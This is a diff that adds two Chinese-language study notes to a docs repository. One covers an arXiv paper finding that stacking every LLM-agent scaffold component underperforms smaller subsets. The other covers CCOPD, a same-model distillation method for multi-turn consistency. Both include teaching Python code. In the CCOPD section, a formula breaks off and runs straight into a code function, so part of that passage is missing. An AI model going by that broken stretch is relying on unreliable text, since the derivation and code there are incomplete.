从日常类比开始:给新手厨师加太多「辅助装备」 + +想象你教一位新手做一道菜。你可以给他: + +- **菜谱分解卡(Planning)**:先把任务拆成「备料 → 下锅 → 调味」 +- **专用工具(Tool Use)**:温度计、计时器、搜索引擎查「这步该几度」 +- **便签本(Memory)**:记录刚才试过的温度和结果 +- **步骤模板(Structured Reasoning)**:强制写「观察 → 推理 → 行动」 +- **复盘环节(Reflection)**:每做完一步就自问「刚才对不对?要不要改?」 + +直觉上,**装备越全越好**。但厨房台面就那么大,新手注意力也有限——五样东西同时占着台面,他反而可能: + +- 一边读分解卡,一边翻便签,**忘了看锅** +- 复盘写太长,**挤掉真正该执行的步骤** +- 工具说明书和模板格式占满视野,**搜索到的关键信息被淹没** + +论文 *More Is Not Always Better*(Liu, arXiv:2605.05716)把 LLM Agent 领域长期默认的「脚手架堆叠 = 更强 Agent」推上实验台,发现类似现象:**Cross-Component Interference(CCI,跨组件干扰)**——单独看每个组件都「合理」,组合在一起却可能**负边际收益**,全配齐的 All-In Agent 反而输给更小的子集。 + +--- + +## 是什么 + +**LLM Agent 脚手架(scaffolding)** 指围绕基础大模型加的一层「能力包装」:规划、工具调用、记忆、结构化推理、自我反思等。LangChain 一类框架鼓励自由组合,但很少系统回答:**该开哪几个开关?** + +**Cross-Component Interference(CCI)** 是论文的操作性定义:对配置 \(C\) 和不在其中的组件 \(s\),若 + +\[ +\phi(C \cup \{s\}) < \phi(C) +\] + +即「加上 \(s\) 后任务指标 \(\phi\) 下降」,则称发生 CCI。这里 \(\phi\) 可以是 HotpotQA 的 token-level \(F_1\),或 GSM8K 的 exact-match 准确率。 + +论文在五类标准组件上做 **全因子实验(full factorial design)**: + +| 符号 | 组件 | 作用(简化) | +|------|------|----------------| +| **P** | Planning | 系统级指令:把任务分解为子目标 | +| **T** | Tool Use | 函数调用接口 + 工具描述 | +| **M** | Memory | 跨步持久化的工作记忆 | +| **SR** | Structured Reasoning | Chain-of-Thought 式格式约束 | +| **R** | Reflection | 每步后的自我评估提示 | + +共 \(2^5 = 32\) 种配置;在 HotpotQA(多跳检索 QA)与 GSM8K(数学推理)上,对 Llama-3.1-8B/70B、Qwen2.5-3B/7B、Claude Haiku 4.5 等模型做了 **118 个受控配置、32,000+ 次评测**。 + +--- + +## 为什么重要 + +### 1. 行业默认可能是错的 + +很多 Agent 模板默认「Planning + Tools + Memory + CoT + Reflection 全开」。论文在**每一个测试设定**里发现:**最优配置都是 All-In 的真子集**,五件套从未夺冠。 + +### 2. 「少即是多」不是 universal law + +CCI 不是简单的「组件越少越好」: + +- HotpotQA @ 8B:最优 \(k^* = 1\),**只用 Tool Use** 最好 +- GSM8K @ 8B:最优 \(k^* = 3\),**T + SR + R** 组合最好 +- 70B @ HotpotQA:在 8B 上「加组件就亏」的方向**部分反转**,但 All-In 仍输给最佳子集约 19% + +### 3. 与模型能力耦合(capability gradient) + +| 规模 | HotpotQA 上「最佳子集 vs All-In」差距(量级) | +|------|-----------------------------------------------| +| 8B | ~32%(T alone \(F_1=0.233\) vs All-In \(0.177\),\(p=0.023\)) | +| 70B | ~19%(最佳子集 \(F_1=0.441\) vs All-In \(0.372\)) | +| Claude Haiku 4.5 | ~0%(32 种配置挤在窄区间内,但 All-In 仍非最优) | + +**在 frontier 模型 demo 里「全开也没事」的结论,不能直接下放到 8B–14B 部署模型**——小模型协调容量更紧,CCI 更狠。 + +### 4. 贪心选组件会翻车 + +183/325 个可测三元组违反**次模性(submodularity)**(56.3%),中位次模比 \(\gamma_{med}=0.52\)。意味着:**单独有害的分量,放进特定组合里可能变有益**——「一个一个加直到不涨」的贪心策略不可靠。 + +--- + +## 核心概念 + +### 1. 配置与性能函数 + +- 配置 \(C \subseteq \{P, T, M, SR, R\}\),\(K = |C|\) +- 性能 \(\phi(C)\):同一 benchmark、同一模型、同一 prompt 模板下的指标 +- **All-In**:\(C = \{P, T, M, SR, R\}\),\(K=5\) + +### 2. 最优组件数 \(k^*\) + +\[ +k^* = \arg\max_{K} \max_{|C|=K} \phi(C) +\] + +任务决定 \(k^*\) 落在 1–4 之间,没有 universal 常数。 + +### 3. 机制直觉:共享单一「工作台」——上下文窗口 + +五个组件并不运行在五个独立进程里;它们都往**同一段 context** 里塞 token: + +- Planning 轨迹 +- 工具 schema 与返回 +- Memory 条目 +- CoT 格式要求 +- Reflection 笔记 + +这与 **attention dilution(注意力稀释)**、**instruction interference(指令干扰)** 文献一致:约束越多,模型越难把容量留给「真正解题」的 token。论文的主效应回归 \(R^2=0.916\),**优于** 16 参数 pairwise 交互模型(\(\Delta\text{BIC}=25.3\)),说明多数伤害来自**各组件独立的上下文成本**,而非某一对「天生相克」——尽管高阶三体协同(T+SR+R 在检索任务上)确实存在。 + +### 4. Shapley 分解:谁贡献、谁拖后腿 + +在 HotpotQA @ 8B 上精确计算 Shapley 值(32 个联盟全覆盖): + +| 组件 | Shapley 直觉 | 论文结论(量级) | +|------|--------------|------------------| +| **Tool Use (T)** | 脚手架价值的绝对主力 | 约占 scaffold 总价值的 **70%**(\(\phi \approx +0.177\)) | +| **Planning (P)** | 常帮倒忙 | **显著为负**;在 84% CCI 任务上添加 P 降分 | +| **Memory (M)** | 检索 QA 上偏负 | 约 68% 任务上添加 M 降分 | +| **SR / R** | 任务依赖 | 数学(GSM8K)上 SR+R 与 T 协同;纯检索上可能增噪 | + +**没有 T 的配置**:HotpotQA @ 8B 上 \(F_1\) 均值约 **0.043**;有 T 的配置均值约 **0.204**——工具接口是「能不能做题」的分水岭,其余组件是在「会不会被互相拖累」。 + +### 5. 三体协同( exploratory ) + +Harsanyi 三阶交互 **T + SR + R** 在检索任务上有正残差(\(\text{INT}_3 \approx +0.175\),BCa 95% CI 下界略大于 0),说明**高阶组合效应真实存在**,不能从 pairwise 完全还原——但论文也强调该发现待更多 seed 确认。 + +--- + +## 关键实验数字(零基础版速查) + +### HotpotQA,Llama-3.1-8B,10 seeds + +| 配置 | 组件数 \(K\) | Mean \(F_1\) | 相对 T alone | +|------|-------------|--------------|--------------| +| **T** | 1 | **0.233 ± 0.039** | 基线 | +| T+SR+R | 3 | 0.220 ± 0.027 | 略低 | +| All-In | 5 | **0.177 ± 0.049** | **低 32%**(\(p=0.023\),\(d_z=0.87\)) | + +从 T 出发的 6 种扩展里,**5/6 在 \(p<0.05\) 显著变差**(4/6 经 Holm–Bonferroni 校正仍显著)。 + +### GSM8K,Llama-3.1-8B + +| 配置 | 准确率 | 备注 | +|------|--------|------| +| **T + SR + R**(\(k^*=3\)) | **~0.43** | 最优子集 | +| All-In | ~0.24 | 比最优低 **~79%**(\(p=0.010\)) | + +数学推理需要格式(SR)与纠错(R),但 **Planning + Memory 全开仍可能过噪**。 + +--- + +## 代码示例 1:用位掩码枚举 32 种脚手架配置 + +论文的核心实验设计是 **全因子 sweep**。下面用 Python 教学骨架展示:如何用 bitmask 生成配置、跑 benchmark、检测 CCI。 + +```python +from dataclasses import dataclass +from itertools import combinations +from typing import Callable + +# 五类组件与 LangChain / 自研 Agent 里的 prompt 块一一对应 +COMPONENTS = { + "P": "planning", # 子目标分解指令 + "T": "tool_use", # 工具 schema + 调用循环 + "M": "memory", # 跨步 observation 缓存 + "SR": "structured_reasoning", # CoT 格式 + "R": "reflection", # 每步 self-critique +} +MASK = {name: 1 << i for i, name in enumerate(COMPONENTS)} + + +@dataclass(frozen=True) +class ScaffoldConfig: + mask: int + + def has(self, key: str) -> bool: + return bool(self.mask & MASK[key]) + + def with_component(self, key: str) -> "ScaffoldConfig": + return ScaffoldConfig(self.mask | MASK[key]) + + def active(self) -> frozenset[str]: + return frozenset(k for k in COMPONENTS if self.has(k)) + + def __repr__(self) -> str: + parts = [k for k in COMPONENTS if self.has(k)] + return "+".join(parts) if parts else "Baseline" + + +def all_configs() -> list[ScaffoldConfig]: + """论文中的 2^5 = 32 种配置。""" + return [ScaffoldConfig(m) for m in range(32)] + + +def build_prompt_blocks(cfg: ScaffoldConfig) -> dict[str, str]: + """每个组件映射到一段 system / tool / post-step 文本。""" + blocks: dict[str, str] = {} + if cfg.has("P"): + blocks["planning"] = "先把问题分解为 2-4 个子目标,再逐步解决。" + if cfg.has("T"): + blocks["tools"] = "你可以调用 search(query) 检索 Wikipedia。" + if cfg.has("M"): + blocks["memory"] = "把每步 observation 写入 WORKING_MEMORY。" + if cfg.has("SR"): + blocks["cot"] = "每步按 Observation / Thought / Action 格式输出。" + if cfg.has("R"): + blocks["reflect"] = "每步结束后评估上一步是否正确。" + return blocks + + +def detect_cci( + scores: dict[ScaffoldConfig, float], +) -> list[tuple[ScaffoldConfig, str, float]]: + """ + 返回所有 (C, s) 满足 phi(C∪{s}) < phi(C) 的 CCI 实例。 + scores: 配置 -> HotpotQA F1 或 GSM8K accuracy + """ + violations = [] + for cfg in all_configs(): + base = scores.get(cfg) + if base is None: + continue + for key in COMPONENTS: + if cfg.has(key): + continue + expanded = cfg.with_component(key) + new = scores.get(expanded) + if new is not None and new < base: + delta = new - base + violations.append((cfg, key, delta)) + return violations + + +def run_factorial_experiment( + evaluate: Callable[[ScaffoldConfig], float], +) -> dict[ScaffoldConfig, float]: + """对 32 种配置各跑 evaluate,复现论文 sweep 结构。""" + return {cfg: evaluate(cfg) for cfg in all_configs()} + + +# --- 用法示意 --- +# scores = run_factorial_experiment(lambda c: hotpotqa_f1(build_agent(c), n=100)) +# for cfg, comp, delta in sorted(detect_cci(scores), key=lambda x: x[2]): +# print(f"CCI: {cfg} + {comp} -> {delta:+.3f}") +``` + +**读代码时注意**: + +- `ScaffoldConfig` 与论文 coalition \(C\) 同构;`detect_cci` 直接实现 Definition 1。 +- 真实实验还要固定 **model、temperature、max steps、benchmark split**;论文用 temperature=0.1,每题最多 4 步,每步最多 256 new tokens。 +- 若只测 All-In vs T,会**漏掉** \(k^*=3\) 这类中间最优——全因子设计的价值正在于不遗漏交互结构。 + +--- + +## 代码示例 2:按任务选择脚手架子集(替代 All-In 默认) + +下面展示一个**任务感知**的 scaffold 选择器:先根据任务类型给出 prior,再用验证集上的少量样本做 subset search——对应论文建议的 *interaction-aware subset selection*。 + +```python +from dataclasses import dataclass + + +@dataclass +class TaskProfile: + name: str + needs_tools: bool + needs_math_format: bool + needs_multi_hop: bool + + +# 论文经验先验:HotpotQA 偏检索,GSM8K 偏推理+反思 +TASK_PRIORS: dict[str, set[str]] = { + "hotpotqa": {"T"}, # k*=1 @ 8B + "gsm8k": {"T", "SR", "R"}, # k*=3 @ 8B +} + + +def scaffold_score( + active: set[str], + profile: TaskProfile, + val_metric: float, +) -> float: + """ + 综合验证集指标与复杂度惩罚。 + val_metric: 在 held-out 100 题上的 F1 或 accuracy + """ + complexity_penalty = 0.02 * len(active) # 每多一个组件,略罚过拟合/上下文成本 + missing_tool = profile.needs_tools and "T" not in active + if missing_tool: + return -1.0 + return val_metric - complexity_penalty + + +def best_subset_search( + profile: TaskProfile, + evaluate_subset: callable, + candidates: list[set[str]] | None = None, +) -> set[str]: + """ + evaluate_subset(active_components) -> float + candidates 默认从 TASK_PRIORS 出发,再尝试增删分量。 + """ + if candidates is None: + base = set(TASK_PRIORS.get(profile.name, {"T"})) + keys = ["P", "T", "M", "SR", "R"] + candidates = [base] + # 尝试 base 的单点增删(教学版;论文用完整 32 格 + Shapley) + for k in keys: + candidates.append(base | {k}) + candidates.append(base - {k}) + candidates.append(set(keys)) # All-In,用于对照而非默认 + + best_active: set[str] = {"T"} + best_score = -1.0 + for active in candidates: + if profile.needs_tools and "T" not in active: + continue + metric = evaluate_subset(frozenset(active)) + score = scaffold_score(active, profile, metric) + if score > best_score: + best_score = score + best_active = set(active) + return best_active + + +class AgentRunner: + """把选中的组件真正拼进 prompt / loop。""" + + def __init__(self, active: set[str], llm, tools): + self.active = active + self.llm = llm + self.tools = tools + + def run_episode(self, question: str, max_steps: int = 4) -> str: + memory: list[str] = [] + state = question + + for step in range(max_steps): + messages = [state] + + if "P" in self.active and step == 0: + messages.insert(0, "Planning: 列出子目标。") + if "M" in self.active and memory: + messages.append("Memory:\n" + "\n".join(memory[-5:])) + if "SR" in self.active: + messages.append("按 Observation/Thought/Action 输出。") + + if "T" in self.active: + action = self.llm.act_with_tools(messages, self.tools) + else: + action = self.llm.complete(messages) + + obs = self.tools.execute(action) if "T" in self.active else "" + if "M" in self.active: + memory.append(f"step={step} obs={obs[:200]}") + + if "R" in self.active: + critique = self.llm.complete(f"评估上一步: {action}\n{obs}") + messages.append(f"Reflection: {critique}") + + state = f"{state}\n{action}\n{obs}" + if self._is_final(action): + break + return self._extract_answer(state) + + def _is_final(self, action: str) -> bool: + return "FINAL_ANSWER" in action + + def _extract_answer(self, state: str) -> str: + return state.split("FINAL_ANSWER:")[-1].strip() + + +# --- 部署伪代码 --- +# profile = TaskProfile("hotpotqa", needs_tools=True, needs_math_format=False, needs_multi_hop=True) +# best = best_subset_search(profile, lambda s: dev_f1(AgentRunner(s, llm, tools))) +# assert best != {"P","T","M","SR","R"}, "论文:All-In 几乎从不最优" +``` + +**工程启示**: + +1. **不要把 LangChain 默认模板当最优解**——先用小验证集 sweep 或至少对照 `T` vs All-In。 +2. **HotpotQA 类检索任务 @ 小模型**:优先试 **仅 Tool Use**;Planning/Memory 可能是负贡献。 +3. **GSM8K 类数学 @ 小模型**:试 **T+SR+R**,而非五件套。 +4. 模型变大后 CCI **减弱但不消失**——仍应选 best subset,只是差距缩小。 +5. 与 Microsoft Research 提出的 **tool-space interference**(工具名冲突、工具过多)是相邻问题:CCI 管「prompt 组件」,tool-space 管「MCP 工具生态」——两者都会让小模型「装太多」。 + +--- + +## 实验协议细节(复现时必读) + +| 维度 | 论文设定 | +|------|----------| +| 模型 | Llama-3.1-8B/70B-Instruct(70B 用 4-bit NF4)、Qwen2.5-3B/7B、Claude Haiku 4.5 | +| Benchmark | HotpotQA(\(F_1\))、GSM8K(exact match) | +| 每配置题量 | 100 题;关键配置 10 seeds × 100 题 | +| 推理步数 | 最多 4 steps | +| 采样 | temperature=0.1, top-p=0.9, max 256 new tokens/step | +| 统计 | paired t-test + Wilcoxon;报告 Cohen's \(d_z\);Bayesian BF\(_{10}\) | + +**稳健性**:换 prompt paraphrase 三种变体,All-In 仍非最优;换 Qwen 家族,CCI 方向复现;长度匹配对照表明差距不是简单「context 变长」 artifact(差距仍达 6–9×)。 + +--- + +## 与相关工作的关系 + +| 方向 | 代表工作 | 与 CCI 论文的差异 | +|------|----------|-------------------| +| 单组件展示 | ReAct, Reflexion, Voyager | 证明「某组件有用」,未系统测 **组合** | +| 消融 | 常见 one-at-a-time ablation | 看不到 **高阶交互** 与次模违反 | +| Prompt 干扰 | instruction interference, paradoxical interference | 多为 **成对** 目标冲突;CCI 给出 **32 格全景观** | +| 组件回归 | Lauziere et al. 2026 pairwise 模型 | 同模型类;本文主效应更 parsimonious,并算 Shapley / Harsanyi | +| 工具生态 | Microsoft tool-space interference | MCP 工具过多、重名;CCI 管 **脚手架 prompt 块** | + +同一时期还有 *When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?*(Li & Tao, arXiv:2605.28224)从 **记忆 × 搜索策略** 二维分解记忆收益——与 CCI **正交**:CCI 问「开哪些组件」,记忆论文问「在已开组件下,记忆怎么传、传什么抽象」。 + +--- + +## 实践 checklist(给 Agent 开发者) + +1. **建立 baseline 网格**:至少跑 `{T}`, `{T,SR,R}`, All-In 三种,而不是只跑 demo 最炫的全套。 +2. **按任务选 \(k^*\)**:检索 QA 倾向少组件;符号推理倾向 T+SR(+R)。 +3. **按模型规模调整预期**:8B 上 CCI 大,70B 上可适度加组件,但 **All-In 仍 rarely optimal**。 +4. **慎用 Planning + Memory 叠在小模型检索 Agent 上**:Shapley 与 disrupt 比例都指向负贡献。 +5. **别贪心堆组件**:56% 次模违反 → 用验证集 **subset search** 或 Shapley 指导,而非「有用就加」。 +6. **监控 context 构成**:每组件增加了多少 token?主效应模型暗示这是主要伤害机制。 +7. **记录配置向量**:生产日志里保存 `{P,T,M,SR,R}` bitmask,方便 offline 复现 factorial 分析。 + +--- + +## 局限与开放问题 + +- **五个组件** 覆盖主流 taxonomy,但不含 multi-agent、code interpreter、RAG 管线粒度等。 +- **两个 benchmark、有限步数**——SWE-bench 等更长程任务上 \(k^*\) 可能上移。 +- **三体协同 INT₃** 标记为 exploratory,需更多 seed 与任务外推。 +- 论文聚焦 **prompt-based scaffolding**,不包含 fine-tune 或 RL 训出的策略——CCI 是否存在于训后 Agent 仍待研究。 +- Claude Haiku 上差距接近噪声,**不等于**「 frontier 上 All-In 最优」——只是「差距小」,All-In 仍未夺冠。 + +--- + +## 一句话总结 + +**LLM Agent 脚手架不是「功能越多越好」的自助餐,而是一道有交互副作用的配方题。** Cross-Component Interference 说的是:Planning、Memory 等模块会争抢同一 context 里的模型注意力;在 Llama-3.1-8B 上,HotpotQA 只要 Tool Use 就能比五件套高 32% \(F_1\),GSM8K 则是精简的三组件组合比 All-In 高 79%。**默认全开 All-In,在论文测试的每一个设定里都是 suboptimal 的选择**——应用侧应改为任务感知、模型感知、交互感知的 **subset selection**。 + +--- + +## 延伸阅读 + +- 原文:[arXiv:2605.05716](https://arxiv.org/abs/2605.05716) +- 反模式梳理:[AgentPatterns — Cross-Component Interference](https://agentpatterns.ai/anti-patterns/cross-component-interference/) +- 相邻问题:[Microsoft Research — Tool-space Interference](https://www.microsoft.com/en-us/research/video/tool-space-interference-an-emerging-problem-for-llm-agents/) +- 记忆维度补充:本库笔记 [When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?](/docs/papers/memory-tool-use-agents) diff --git a/src/content/docs/papers/ccopd-distillation.md b/src/content/docs/papers/ccopd-distillation.md new file mode 100644 index 000000000..43cd68c37 --- /dev/null +++ b/src/content/docs/papers/ccopd-distillation.md @@ -0,0 +1,368 @@ +--- +title: CCOPD — 多轮语言模型的规范上下文在线策略蒸馏 +来源: https://arxiv.org/abs/2605.30251 +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:同一道题,分三次说完 vs 一次说完 + +想象你在帮朋友算婚礼餐饮预算。有两种沟通方式,**信息总量完全一样**: + +**方式 A(FULL,一次说完)** +「Jenny 婚礼 80 位客人,想要牛排的是想要鸡肉的 3 倍,牛排 $25、鸡肉 $18,总预算是多少?」 + +**方式 B(RAW-SHARDED,分多轮说完)** +- 第 1 轮用户:「牛排 $25、鸡肉 $18,总预算是多少?」 +- 助手(信息还不全):「大概需要知道人数和比例……我先假设各一半?」← **自己猜了一个数** +- 第 2 轮用户:「80 位客人。」 +- 助手:「那按刚才的假设……」← **继续沿用错误假设** +- 第 3 轮用户:「想要牛排的是想要鸡肉的 3 倍。」 +- 助手最终答案:可能和方式 A **不一样**——不是因为它没收到全部事实,而是**被中间自己说过的话「锚定」了**。 + +这就是论文标题 *Same Evidence, Different Answers* 的核心:**证据相同,答案却可能不同**。 +浙江大学等作者提出的 **CCOPD(Canonical-Context On-Policy Distillation)**,目标是把这种「多轮分片说」时的表现,拉齐到「一次说全」时的表现——而且**不需要更强的外部教师模型**,也**不需要推理时额外修修补补**。 + +--- + +## 这篇论文在解决什么问题 + +### 1. 规范上下文一致性(Canonical-Context Consistency) + +用户很少在第一句话就把任务说完整;真实对话里,约束往往是**逐轮披露**的。一个可靠的多轮模型应满足: + +> 当 RAW-SHARDED 对话里**所有用户侧证据**都已披露完毕时,最终答案分布应接近 **FULL**(一次性完整 prompt)条件下的分布。 + +形式化写作: + +$$ +\pi(y \mid h(q)) \approx \pi(y \mid c(q)) +$$ + +其中 $c(q)$ 是规范 FULL prompt,$h(q)$ 是任务等价的 RAW-SHARDED 历史。 + +### 2. 自锚定漂移(Self-Anchored Drift) + +RAW-SHARDED 历史不只是「更长的 prompt」,它还包含模型**在信息不全时**自己生成的中间回复 $a_1, a_2, \ldots$。这些回复可能带有: + +- 未经验证的猜测 +- 临时答案 +- 过早的承诺 + +等最后一轮用户把缺失事实补全后,上下文里**用户证据已经完整**,但模型仍可能被**自己 earlier 的 assistant 文本**带偏——论文称此为 **self-anchored drift**。 + +### 3. CCOPD 的思路(一句话) + +用**同一个基座模型**扮演两个角色: + +| 角色 | 输入 | 是否训练 | +|------|------|----------| +| **Teacher(教师)** | 干净的 FULL prompt | 冻结 | +| **Student(学生)** | 真实的 RAW-SHARDED 多轮历史(含污染性的中间回复) | 可训练(LoRA) | + +学生在**自己 rollout 出的最终答案前缀**上生成;教师在同一答案前缀下、但 conditioning 于 FULL prompt,给出「规范」的下一 token 分布。训练最小化 **reverse KL**,把多轮路径的行为对齐到 FULL 路径——这是 **on-policy** 的:监督的是学生**实际走到的状态**,而非固定演示轨迹。 + +--- + +## 三种任务等价呈现模式 + +论文沿用 Laban 等(2025)的 **task-equivalent sharding** 设定: + +| 模式 | 含义 | 典型用途 | +|------|------|----------| +| **FULL** | 完整题目一次给出 | 上界 / 教师条件 | +| **CONCAT** | 所有 user shard 拼成一条,无中间 assistant 回复 | 对照:有分片、无自污染 | +| **RAW-SHARDED** | 用户逐轮披露 shard,中间穿插**真实模型**生成的 assistant 回复 | hardest:测 self-anchored drift | + +GSM8K 风格训练里,shard 构造有个刻意设计:**第一个 shard 往往是「问题句/所求量」**,支持事实排在后面——迫使模型在信息不全时也要说话,从而制造真实的中间污染。 + +--- + +## 核心概念详解 + +### 1. 局部呈现差距 $\Psi_\pi(q, s)$ + +固定同一个答案前缀 $s$,比较两种呈现下下一 token 分布的差异: + +$$ +\Psi_\pi(q, s) = D_{\mathrm{KL}}\!\left(\pi(\cdot \mid h(q), s) \,\|\, \pi(\cdot \mid c(q), s)\right) +$$ + +- 同一模型、同一前缀,**只换上下文呈现方式** +- 值越大 → 该前缀处模型对「分片历史 vs 完整 prompt」越敏感 +- CCOPD 把这个差距变成训练信号 + +### 2. On-Policy Canonical Relabeling + +对每个保留的 pair $(c, h)$: + +1. 学生从 RAW-SHARDED 历史 $h$ **采样**最终答案 rollout $\hat{y}_{1:T}$ +2. 对每个属于最终答案的 token 位置 $t$,计算 + - 学生:$p_\theta(\cdot \mid h, \hat{y}_{ list[str]: + text = re.sub(r"\s+", " ", text.strip()) + parts = re.split(r"(?<=[.?!])\s+", text) + if len(parts) >= 2: + return [p.strip() for p in parts if p.strip()] + # fallback: 按连接词切 + for conj in (" while ", " if ", " when ", " then ", " but ", " and "): + if conj in text.lower(): + return [s.strip() for s in re.split(conj, text, flags=re.I) if s.strip()] + return [text] + +def build_static_shards(question: str) -> ShardedTask: + units = split_into_sentences(question) + # 含问号的最后一句作为 query shard(论文:先问「所求量」) + query_idx = max(i for i, u in enumerate(units) if "?" in u) if any("?" in u for u in units) else len(units) - 1 + query = units[query_idx] + facts = [u for i, u in enumerate(units) if i != query_idx] + shards = [query] + facts + return ShardedTask(full_prompt=question, shards=shards) + +# GSM8K 风格例题(论文 Table 7) +q = ( + "Jenny is planning her catering budget for her wedding. " + "She is going to have 80 guests. 3 times as many guests want steak as chicken. " + "If each steak entree costs $25 and each chicken entree costs $18, " + "how much is the total catering budget?" +) +task = build_static_shards(q) +print("FULL:\n", task.full_prompt, "\n") +print("RAW-SHARDED 用户轮次:") +for i, shard in enumerate(task.shards, 1): + print(f" Turn {i} user: {shard}") +# 真实 RAW-SHARDED 还会在每轮 user 后插入 assistant 的 process reply —— 污染来源 +``` + +**读法**:`shards[0]` 往往在信息不全时就问「总预算是多少?」;模型若此时瞎猜并写入上下文,后面即使用 FULL 等价证据补全,也可能 **self-anchor** 到错误中间态。 + +--- + +## 代码示例 2:CCOPD 的 reverse-KL 损失(PyTorch 伪代码) + +这是对论文 §4.2 训练目标的**教学级**实现骨架:同一前缀、双条件、只 mask 最终答案 token。 + +```python +import torch +import torch.nn.functional as F + +def reverse_kl(student_logits, teacher_logits, mask): + """ + student_logits, teacher_logits: [batch, seq_len, vocab] + mask: [batch, seq_len] bool,True 表示属于 final-answer 位置 + """ + # 只在 mask 位置算 KL( student || teacher ) + s_logp = F.log_softmax(student_logits, dim=-1) + t_logp = F.log_softmax(teacher_logits, dim=-1) + t_prob = t_logp.exp() + + kl_token = (t_prob * (t_logp - s_logp)).sum(dim=-1) # [batch, seq_len] + kl = (kl_token * mask.float()).sum() / mask.float().sum().clamp(min=1) + return kl + +def ccopd_step(student_model, teacher_model, full_ids, raw_history_ids, tokenizer): + """ + full_ids: FULL prompt token ids(仅 teacher 可见) + raw_history_ids: RAW-SHARDED 历史,止于 final user turn(仅 student 可见) + """ + teacher_model.eval() + for p in teacher_model.parameters(): + p.requires_grad = False + + # 1) 学生 on-policy rollout 最终答案 + with torch.no_grad(): + gen = student_model.generate( + raw_history_ids, + max_new_tokens=512, + do_sample=True, + temperature=1.0, + top_p=0.95, + ) + answer_start = raw_history_ids.shape[1] + answer_ids = gen[:, answer_start:] + prefix_ids = gen[:, :answer_start + answer_ids.shape[1]] + + # 2) 构造 final-answer mask(简化:生成段全部计入) + seq_len = prefix_ids.shape[1] + mask = torch.zeros_like(prefix_ids, dtype=torch.bool) + mask[:, answer_start:] = True + + # 3) 双路 forward:同一 prefix,不同 conditioning + # Teacher: condition on FULL + shared answer prefix + teacher_in = torch.cat([full_ids, answer_ids], dim=1) + teacher_logits = teacher_model(teacher_in).logits[:, full_ids.shape[1]-1:-1] + + # Student: condition on RAW history + shared answer prefix + student_logits = student_model(prefix_ids).logits[:, answer_start-1:-1] + + loss = reverse_kl(student_logits, teacher_logits, mask[:, answer_start:]) + loss.backward() + return loss.item() +``` + +**对应关系**: + +- `teacher_model` = 冻结的同 backbone FULL 条件 +- `student_model` = 可训练 RAW-SHARDED 条件 +- `reverse KL` 把学生分布拉向教师——学生若被 self-anchor 带偏,在该前缀上的 logits 会与 FULL 教师不一致,梯度推动修正 + +--- + +## 代码示例 3:演示 self-anchored drift 的对话结构 + +```python +from dataclasses import dataclass + +@dataclass +class Turn: + role: str + content: str + +def raw_sharded_history() -> list[Turn]: + """同一 FULL 题的信息,分多轮披露;assistant 中间回复可能污染最终答案。""" + return [ + Turn("system", "You are a helpful math tutor."), + Turn("user", "If steak is $25 and chicken is $18, what's the total catering budget?"), + Turn("assistant", "I'll assume 50 steak and 30 chicken guests for now... budget ≈ $1790."), + Turn("user", "There are 80 guests total."), + Turn("assistant", "Keeping my earlier split, adjusting slightly..."), + Turn("user", "Three times as many want steak as chicken."), + # 下一 turn 才应给出最终答案;但上下文里已留下错误 numeric anchor + ] + +def full_prompt() -> str: + return ( + "Jenny's wedding: 80 guests; steak guests = 3× chicken guests; " + "steak $25, chicken $18. Total catering budget?" + ) + +# CCOPD 训练目标:在 raw_sharded_history() 条件下生成的最终答案, +# 其 token 分布应接近在 full_prompt() 条件下、同一答案前缀上的分布。 +``` + +--- + +## 训练配置速查(论文 Appendix J) + +| 项目 | 配置 | +|------|------| +| 基座 | Qwen3-8B | +| 微调 | LoRA r=16, α=32, ~43.65M 参数 | +| 数据 | 6k RAW-SHARDED 数学对话 | +| 目标 | CCOPD KL-only | +| LR | 3e-5,AdamW,4 epochs | +| Rollout | temperature=1.0, top-p=0.95, max 4096 new tokens | +| 算力 | ~132 GPU·hours(RTX 4090) | + +--- + +## 与相关工作的关系 + +- **Lost in Conversation / Laban 2025**:提出 task-equivalent sharding 评测框架;CCOPD 在其 RAW-SHARDED 设定上训练与评估 +- **On-Policy Distillation (OPD)**:一般让学生跟 teacher 的 on-policy 轨迹;CCOPD 的特殊性是 **同 backbone、不同呈现**,teacher 并非更强模型 +- **OPCD(On-Policy Context Distillation, arXiv:2602.12275)**:把上下文蒸馏进参数;CCOPD 专注 **多轮呈现不变性** 而非压缩 system prompt +- **Locally Coherent, Globally Incoherent(2605.30335)**:都涉及「局部看起来合理、全局却有问题」;CCOPD 是**单模型多轮**层面的 self-anchor,LCGI 是**多组件 Agent** 层面的概率不一致 + +--- + +## 局限与论文自述边界 + +1. **Shard 构造是确定性的 GSM8K 风格**,不覆盖所有自然多轮对话形态 +2. **English only**,任务族以 instruction-following / reasoning 为主 +3. **不能宣称**对所有 full-context 污染格式都免疫——强 user-side hint 仍比 assistant-side 更难 +4. 提升 task correctness ≠ 通用安全 / 事实性保证;部署仍需原有 guardrails +5. 测试时 lightweight reset/defer prompt 对 CCOPD 模型反而略降分——说明能力已**内化**,额外 meta 指令冗余 + +--- + +## 给工程师的 takeaway + +1. **多轮 ≠ 长 prompt**:assistant 历史是**一阶公民**,会改变最终答案分布 +2. **评测要分 FULL / RAW-SHARDED**:只在 FULL 上刷分,无法代表真实聊天产品 +3. **CCOPD 是训练处方**:同模型自蒸馏 + FULL 作 canonical view + on-policy reverse KL +4. **数学-only 训练可迁移**:对齐「等证据不同呈现」这一**元能力**,不绑具体领域 +5. 若你在做 agent / 多轮 copilot:优先检查是否存在 **self-anchored drift**(中间 tool 输出、草稿、错误假设是否污染最终决策) + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.30251](https://arxiv.org/html/2605.30251v1) +- 相关工作:Laban et al. (2025) sharded instruction evaluation +- 同期:**OPCD**(上下文内化蒸馏)、**LCGI**(多组件全局不一致) + +--- + +## 自测题 + +1. FULL 与 RAW-SHARDED 在**用户证据**上等价时,为什么答案仍可能不同? +2. CCOPD 的 teacher 比 student「强」吗?强在哪里、不强在哪里? +3. 为什么是 **reverse KL** 且只在 **final-answer mask** 上算? +4. CONCAT 模式在 ablation 里通常起什么对照作用? +5. 若只有推理预算、不能训练,论文 Appendix H 哪种 test-time mode 对 base 模型更有帮助? + +
